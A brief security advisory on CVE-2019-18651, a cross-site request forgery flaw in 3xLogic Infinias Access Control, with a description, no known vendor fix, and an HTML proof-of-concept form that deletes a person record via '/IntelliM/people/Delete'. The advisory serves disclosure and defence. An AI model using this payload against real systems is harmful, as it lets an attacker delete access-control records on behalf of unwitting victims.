SB2019111503 - Cross-site request forgery in 3xLogic Infinias Access Control
Published: November 15, 2019
Breakdown by Severity
- Low
- Medium
- High
- Critical
Description
This security bulletin contains information about 1 security vulnerability.
1) Cross-site request forgery (CVE-ID: CVE-2019-18651)
The vulnerability allows a remote attacker to perform cross-site request forgery attacks.
The vulnerability exists due to insufficient validation of the HTTP request origin. A remote attacker can trick the victim to visit a specially crafted web page and perform arbitrary actions on behalf of the victim on the vulnerable website.
PoC:
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://localhost/IntelliM/people/Delete">
<input type="hidden" name="id" value="Numeric_ID" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
Remediation
Cybersecurity Help is not aware of any official remediation provided by the vendor.